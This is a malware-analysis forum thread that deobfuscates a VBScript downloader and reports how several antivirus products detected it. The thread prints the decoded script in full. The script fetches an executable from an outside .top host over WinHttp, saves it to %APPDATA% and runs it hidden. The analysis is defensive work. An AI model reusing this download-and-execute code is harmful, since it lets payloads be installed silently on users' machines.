Malware Analysis 1.vbs sample - downloader - VBSWGbased.gen - deobfuscation

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
1.vbs

2/53

https://www.virustotal.com/en/file/...bb68230d813bf8272f74b4409f337870a12/analysis/

exe file dropped : BehavesLike.Win32.ZeroAccess.mm
temporary random name + ".exe"
radB8945.tmp.exe

in %APPDATA%\

"C:\Users\DardiM\AppData\Roaming\"

As often, I will make an analysis of the downloader script, deobfuscating it.
I have chosen this sample because it is fresh and not currently detected by most AV / anti-malware tools

After I unzipped
1.vbs :
when I began this post :
- Not detected by KTS, ZAM (licence )
- Detected by Crystal Security cloud engine as soon as I ran it (CS) : 4 AVs
- VoosooShield detected it and report 2 threats : Block both file was recommended

Script used : Visual Basic Scripting

(1) Quick analysis

This script contains 34 lines of 2049 chars, 1 line of 2080 chars
all 34 lines are only put to make it "harder" to see the real interesting part.

If you edit the file with "wrap" enable, it looks like an incoherent "language" everywhere (or may be an extraterrestrial language :confused: )

=> it's better to deactivated this option to analyse our sample :)

All 34 useless lines begin by ' => normally used to put comment on code, here it put text to obfuscate a lot of more the whole script, but as comment, all the lines can be deleted

We can eliminate all the line beginning by the char '
'2SUbQ7x9dr7ct3tzc019w5 qa0zmnyiA0p 4Izb0R12im gZm2t DKzTAZyWlJB6ZijnbHdYrcSKhUNhAKcj3aZCsMG03pqB sxkGwG djwY40Zt mJt3hFxEiLON xDYrQD1 PFXmOZITUoie5NJC REu ..............

Whe then keep only the line 17 with the real important part

=> line 17 :

Function JXAHJSM(s): Dim g,a: For g=1 To Len(s) Step 2:a=a & Chr("&H" & Mid(s,g,2)):Next:JXAHJSM= a:EndMid(s,g,2)):Next:JXAHJSM= a:End Function:Execute(JXAHJSM("4F6E204572726F72205265737 ................456E642049663A")):

The first function is not to hard to understand : it receives as parameter a string (in red above - only a small part because there is 1948 chars), and 2 chars by 2 chars a modification is made.

Chr("&H" & Mid(s,g,2)) => HEX to ASCII conversion

The second function executes the first one

(2) HEX to ASCII

On Error Resume Next:CreateObject("dc"):
If Err.Number>0 Then Function CEKFRDUO(POGQVLS):
set CEKFRDUO=CreateObject(POGQVLS):End
Function:Set WCQXGR=CEKFRDUO(JXAHJSM("536372697074696E672E46696C6553797374656D4F626A656374")):
Set UZWAFBHXM=CEKFRDUO(
JXAHJSM("575363726970742E5368656C6C")):
Set CXAKA=CEKFRDUO(
JXAHJSM("57696E487474702E57696E48747470526571756573742E352E31")):
Set HSKWV=CEKFRDUO(
JXAHJSM("41444F44422E53747265616D")):
EYWZV=WCQXGR.BuildPath(UZWAFBHXM.ExpandEnvironmentStrings("%APPDATA%"),WCQXGR.GetTempName):
On Error Resume Next:
Err.Clear:
CXAKA.Open
JXAHJSM("474554"),JXAHJSM("687474703A2F2F676F706C6472746F702E746F702F6C6F672E7068703F663D312E6A7067"),0:
If Err=0 Then CXAKA.Send:HSKWV.Type=1:HSKWV.Open:HSKWV.Write CXAKA.ResponseBody:HSKWV.Position=0:EYWZV=EYWZV+
JXAHJSM(".exe"):
Set MRLHFPWV=WCQXGR.CreateTextFile(EYWZV):
For QJCXYOBP=0 to lenb(CXAKA.ResponseBody)-1:
MRLHFPWV.Write chr(ascb(HSKWV.Read(1))):Next:
MRLHFPWV.Close:
UZWAFBHXM.Run EYWZV,0:
End If:
End If:

We can see on the spoiler that the main conversion function is used several times.

(3) HEX to ASCII one more time

On Error Resume Next:CreateObject("dc"):
If Err.Number>0 Then Function CEKFRDUO(POGQVLS):
set CEKFRDUO=CreateObject(POGQVLS):End
Function:Set WCQXGR=CEKFRDUO("Scripting.FileSystemObject"):
Set UZWAFBHXM=CEKFRDUO("WScript.Shell"):
Set CXAKA=CEKFRDUO("WinHttp.WinHttpRequest.5.1"):
Set HSKWV=CEKFRDUO("ADODB.Stream")):
EYWZV=WCQXGR.BuildPath(UZWAFBHXM.ExpandEnvironmentStrings("%APPDATA%"),WCQXGR.GetTempName):
On Error Resume Next:
Err.Clear:
CXAKA.Open "GET,"http://gopldrtop.top/NAME.php?f=1.jpg",0:
If Err=0 Then CXAKA.Send:HSKWV.Type=1:HSKWV.Open:HSKWV.Write CXAKA.ResponseBody:HSKWV.Position=0:EYWZV=EYWZV+".exe":
Set MRLHFPWV=WCQXGR.CreateTextFile(EYWZV):
For QJCXYOBP=0 to lenb(CXAKA.ResponseBody)-1:
MRLHFPWV.Write chr(ascb(HSKWV.Read(1))):Next:
MRLHFPWV.Close:
UZWAFBHXM.Run EYWZV,0:End
If:End If:

It's now easier to understand some parts :)

Lets simplified some parts to make them completely deobfuscated

(4) Last step, with some formatting

On Error Resume Next:
CreateObject("dc"):
If Err.Number>0
Then

Function func_CreateObject(string_object):
set func_CreateObject=CreateObject(string_object):
End Function:
Set fso =
CreateObject("Scripting.FileSystemObject"):
Set shell=
CreateObject("WScript.Shell"):
Set obj_http =
CreateObject("WinHttp.WinHttpRequest.5.1"):
Set obj_ADODBStream =
CreateObject("ADODB.Stream")):
temp_Path=fso.
BuildPath(shell.ExpandEnvironmentStrings("%APPDATA%"),fso.GetTempName):
On Error Resume Next:
Err.Clear:
obj_http.Open
"GET","http://gopldrtop.top/NAME.php?f=1.jpg",0:
If Err=0 Then

obj_http.Send:
obj_ADODBStream.Type=1:
obj_ADODBStream.
Open:
obj_ADODBStream.
Write obj_http.ResponseBody:
obj_ADODBStream.
Position=0:
temp_Path=temp_Path+
".exe":
Set file =fso.
CreateTextFile(temp_Path):
For QJCXYOBP=0 to lenb(obj_http.ResponseBody)-1:
file.Write chr(ascb(obj_ADODBStream.Read(1))):
Next:
file.
Close:
shell.
Run temp_Path,0:
End If:
End If:

I wrote "NAME.php" only for security, that's not the real file name

On Error Resume Next: => Specifies that when a run-time error occurs, control goes to the statement immediately following the statement where the error occurred, and execution continues from that point.

On Error Resume Next:CreateObject("dc"): => generate an error that is expected because "dc" as no mean for CreateObject function :)
If Err.Number>0 Then => right : can continue because the first CreateObject "worked" as expected ;)

"WScript.Shell" to get the %APPDATA% folder and, at the end, to run the exe file
"Scripting.FileSystemObject" to build a path with %APPDATA% and a temp file name (GetTempName gives a random temp file name : .tmp extension) and to create the file
"WinHttp.WinHttpRequest.5.1" method used for the http request
"ADODB.Stream" to save (on memory stream) the content from http request (ResponseBody)

(5) Conclusion

No need to be a complicated obfuscation method to make its job ...
They may have made a more complicated conversion function too ... so thanks to them :p
 
Last edited:

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
Great post @DardiM :)

"- Detected by Crystal Security cloud engine : 4 AVs
- Not seen by KTS, ZAM when I began this post."

Another reason to choose Crystal Security over Zemana.;)

Thanks for the kind words :)

To make my deobfuscation analysis, I didn't run the 1.vbs file

When I said "not detected", I mean "when I have extracted the zip file", and after "when I made a static scan".

As soon as I unzipped the downloader script : 1.vbs in a folder

- Only Crystal Security warned me :
=> file reported as unsafe BECAUSE I make some personal settings : "suspicious file detection" set to 1 % ( default : 5%) and "unsafe file" set to 3% (default : 10 %)
=>3.8 % => unsafe file reported (2/53)

- Crystal Security cloud base engine is a killer :)

- VoodooShield detected the same when I dropped the 1.vbs to the Shield => Blocked recommended (2/53)

KTS ans ZAM didn't react after I have unzipped, and made scans
 
Last edited:

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
Kind of funny that Windows Defender detects this and not really any other AVs. :p

Thanks for the share!

KTS doesn't let you downloading the payload if you go directly on the website (detected as dangerous by cloud).

I think both files are too fresh to have been put on the data-bases, but if running, AVs / anti-malware tools may make their job.
I've made, as I said, an analysis of this .vbs obfuscation method, I can make dynamical test later to see how AVs / Anti-malware tools react.
 
Last edited:

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
July,26 - 11h30 pm (France Time) : When I began my post
July,27 - 03h00 pm (France Time) : Now

(1)
=> ZAM now detects the 1.vbs file by scan and when I try to run it :) : (Script:Generic/bundpill.A!Kaca)

When trying to run radB8945.tmp.exe :

message.jpg


(2)
=> KTS activated (ZAM and VoodooShield off)

The script is run the payload download to %APPDATA% without any warning message.
When run by the scriot, this message that pop :
test.jpg


When after I tried to run manually radB8945.tmp.exe the blue message pop (see above)

Thanks to God, it seems the payload downloaded is corrupted :D
 
Last edited:

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

User Menu

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top